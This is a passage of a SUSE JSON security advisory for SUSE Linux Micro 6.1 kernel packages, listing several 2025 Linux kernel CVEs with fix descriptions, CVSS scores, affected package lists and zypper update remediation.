"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71145",
"url": "https://www.suse.com/security/cve/CVE-2025-71145"
},
{
"category": "external",
"summary": "SUSE Bug 1257155 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257155"
},
{
"category": "external",
"summary": "SUSE Bug 1257156 for CVE-2025-71145",
"url": "https://bugzilla.suse.com/1257156"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "important"
}
],
"title": "CVE-2025-71145"
},
{
"cve": "CVE-2025-71147",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71147"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Fix a memory leak in tpm2_load_cmd\n\n\u0027tpm2_load_cmd\u0027 allocates a tempoary blob indirectly via \u0027tpm2_key_decode\u0027\nbut it is not freed in the failure paths. Address this by wrapping the blob\ninto with a cleanup helper.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71147",
"url": "https://www.suse.com/security/cve/CVE-2025-71147"
},
{
"category": "external",
"summary": "SUSE Bug 1257158 for CVE-2025-71147",
"url": "https://bugzilla.suse.com/1257158"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71147"
},
{
"cve": "CVE-2025-71149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/poll: correctly handle io_poll_add() return value on update\n\nWhen the core of io_uring was updated to handle completions\nconsistently and with fixed return codes, the POLL_REMOVE opcode\nwith updates got slightly broken. If a POLL_ADD is pending and\nthen POLL_REMOVE is used to update the events of that request, if that\nupdate causes the POLL_ADD to now trigger, then that completion is lost\nand a CQE is never posted.\n\nAdditionally, ensure that if an update does cause an existing POLL_ADD\nto complete, that the completion value isn\u0027t always overwritten with\n-ECANCELED. For that case, whatever io_poll_add() set the value to\nshould just be retained.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71149",
"url": "https://www.suse.com/security/cve/CVE-2025-71149"
},
{
"category": "external",
"summary": "SUSE Bug 1257164 for CVE-2025-71149",
"url": "https://bugzilla.suse.com/1257164"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71149"
},
{
"cve": "CVE-2025-71154",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71154"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: usb: rtl8150: fix memory leak on usb_submit_urb() failure\n\nIn async_set_registers(), when usb_submit_urb() fails, the allocated\n async_req structure and URB are not freed, causing a memory leak.\n\n The completion callback async_set_reg_cb() is responsible for freeing\n these allocations, but it is only called after the URB is successfully\n submitted and completes (successfully or with error). If submission\n fails, the callback never runs and the memory is leaked.\n\n Fix this by freeing both the URB and the request structure in the error\n path when usb_submit_urb() fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71154",
"url": "https://www.suse.com/security/cve/CVE-2025-71154"
},
{
"category": "external",
"summary": "SUSE Bug 1257163 for CVE-2025-71154",
"url": "https://bugzilla.suse.com/1257163"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71154"
},
{
"cve": "CVE-2025-71162",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71162"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: tegra-adma: Fix use-after-free\n\nA use-after-free bug exists in the Tegra ADMA driver when audio streams\nare terminated, particularly during XRUN conditions. The issue occurs\nwhen the DMA buffer is freed by tegra_adma_terminate_all() before the\nvchan completion tasklet finishes accessing it.\n\nThe race condition follows this sequence:\n\n 1. DMA transfer completes, triggering an interrupt that schedules the\n completion tasklet (tasklet has not executed yet)\n 2. Audio playback stops, calling tegra_adma_terminate_all() which\n frees the DMA buffer memory via kfree()\n 3. The scheduled tasklet finally executes, calling vchan_complete()\n which attempts to access the already-freed memory\n\nSince tasklets can execute at any time after being scheduled, there is\nno guarantee that the buffer will remain valid when vchan_complete()\nruns.\n\nFix this by properly synchronizing the virtual channel completion:\n - Calling vchan_terminate_vdesc() in tegra_adma_stop() to mark the\n descriptors as terminated instead of freeing the descriptor.\n - Add the callback tegra_adma_synchronize() that calls\n vchan_synchronize() which kills any pending tasklets and frees any\n terminated descriptors.\n\nCrash logs:\n[ 337.427523] BUG: KASAN: use-after-free in vchan_complete+0x124/0x3b0\n[ 337.427544] Read of size 8 at addr ffff000132055428 by task swapper/0/0\n\n[ 337.427562] Call trace:\n[ 337.427564] dump_backtrace+0x0/0x320\n[ 337.427571] show_stack+0x20/0x30\n[ 337.427575] dump_stack_lvl+0x68/0x84\n[ 337.427584] print_address_description.constprop.0+0x74/0x2b8\n[ 337.427590] kasan_report+0x1f4/0x210\n[ 337.427598] __asan_load8+0xa0/0xd0\n[ 337.427603] vchan_complete+0x124/0x3b0\n[ 337.427609] tasklet_action_common.constprop.0+0x190/0x1d0\n[ 337.427617] tasklet_action+0x30/0x40\n[ 337.427623] __do_softirq+0x1a0/0x5c4\n[ 337.427628] irq_exit+0x110/0x140\n[ 337.427633] handle_domain_irq+0xa4/0xe0\n[ 337.427640] gic_handle_irq+0x64/0x160\n[ 337.427644] call_on_irq_stack+0x20/0x4c\n[ 337.427649] do_interrupt_handler+0x7c/0x90\n[ 337.427654] el1_interrupt+0x30/0x80\n[ 337.427659] el1h_64_irq_handler+0x18/0x30\n[ 337.427663] el1h_64_irq+0x7c/0x80\n[ 337.427667] cpuidle_enter_state+0xe4/0x540\n[ 337.427674] cpuidle_enter+0x54/0x80\n[ 337.427679] do_idle+0x2e0/0x380\n[ 337.427685] cpu_startup_entry+0x2c/0x70\n[ 337.427690] rest_init+0x114/0x130\n[ 337.427695] arch_call_rest_init+0x18/0x24\n[ 337.427702] start_kernel+0x380/0x3b4\n[ 337.427706] __primary_switched+0xc0/0xc8",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71162",
"url": "https://www.suse.com/security/cve/CVE-2025-71162"
},
{
"category": "external",
"summary": "SUSE Bug 1257204 for CVE-2025-71162",
"url": "https://bugzilla.suse.com/1257204"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-71162"
},
{
"cve": "CVE-2025-71163",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71163"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndmaengine: idxd: fix device leaks on compat bind and unbind\n\nMake sure to drop the reference taken when looking up the idxd device as\npart of the compat bind and unbind sysfs interface.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
